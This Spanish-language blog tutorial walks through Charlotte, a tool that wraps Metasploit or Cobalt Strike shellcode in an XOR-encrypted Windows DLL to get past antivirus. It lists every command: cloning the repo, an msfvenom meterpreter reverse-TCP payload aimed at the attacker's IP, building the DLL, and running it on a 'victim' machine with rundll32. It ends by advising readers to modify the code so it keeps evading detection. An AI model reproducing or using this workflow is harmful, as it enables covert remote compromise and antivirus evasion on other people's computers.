Charlotte DLL FUD
En esta ocasión hablaremos de esta herramienta, la que promete crear un DLL FUD que haga Bypass de Antivirus.
Esta herramienta que podemos encontrar en el siguiente repositorio de Github:
https://github.com/9emin1/charlotteLa misma genera un DLL para Windows, el cual va a contener Shellcode que le proveamos, tanto sea de Metasploit como de Cobalt Strike, con la intención de ser inyectado y ejecutado en la memoria Ram de un equipo Windows victima, proporcionándonos acceso remoto al mismo siempre y cuando logre hacer Bypass de el software antivirus.
Que cantidad de conceptos que expusimos sin explicar, no se preocupen luego del video en el que se muestra la instalación y explotación con Charlotte los explicaremos. De todas maneras pueden utilizar el formulario de contacto de este sitio para trasladarme sus dudas, sin mas el video:
Comandos utilizados y explicaciones
Primero clonamos el repositorio con Git:
git clone https://github.com/9emin1/charlotte.git
Instalamos el unico requisito:
sudo apt-get install apt-get install mingw-w64*
El que es un Cross Compiler, es decir compila código (C++ en este caso) en un equipo Linux para que funcione en Windows.
Como vimos en el video se debe de tener un Shellcode generado el cual puede ser de Metasploit, que lo generamos con el siguiente comando en nuestro sistema operativo Kali:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=(nuestra dirección IP) LPORT=(nuestro puerto elegido) -f raw > beacon.bin
O con Cobalt Strike como se ve en el video. Dicho Shellcode con el nombre beacon.bin debe de ser colocado en la misma carpeta de Charlotte y ejecutamos el comando:
python3 charlotte.py
Mediante charlotte.py que es un script escrito en Python, es pasado por un método de encriptacion denominado XOR, luego colocado en una template o esqueleto de un programa escrito en C++, el que una vez compilado y convertido en un DLL puede ser ejecutado en un equipo Windows.
Si dicha ejecución es exitosa inyectara en la memoria Ram de ese equipo el Shelcode lo desencriptara y ejecutara, siempre que le proporcionamos la llave de desencriptacion correcta. Por ejemplo se ve en el video que se ejecuta con el comando:
rundll32 charlotte.dll, tvdvhbbdbdb
Donde Runddl32 es el encargado de ejecutar en Windows los DLL, el nombre del archivo y por ultimo la clave para desencriptar el shellcode.
Debo aclarar que el script de Python genera una clave de largo y caracteres al azar, lo que puede provocar que en ocasiones no haga Bypass, de todas maneras todas estas herramientas pierden su efectividad al volverse populares. Si queremos que continue siendo efectiva debemos de leer el codigo, generar cambios en el mismo (customizarlo), para obtener un resultado diferente que logre hacer el Bypass
Espero les sea de utilidad, de surgir dudas contactense.
Referencias:
- XOR = https://es.wikipedia.org/wiki/Cifrado_XOR
- Cobalt Strike = https://www.cobaltstrike.com/ Software para realizar Hacking Ético
- Metasploit = https://www.metasploit.com/ Software para realizar Hacking Ético
- Python = Lenguaje de Programación Interpretado
- C++ = Lenguaje de Programación Compilado
- Shellcode = https://es.wikipedia.org/wiki/Shellcode
- DLL = https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/dynamic-link-library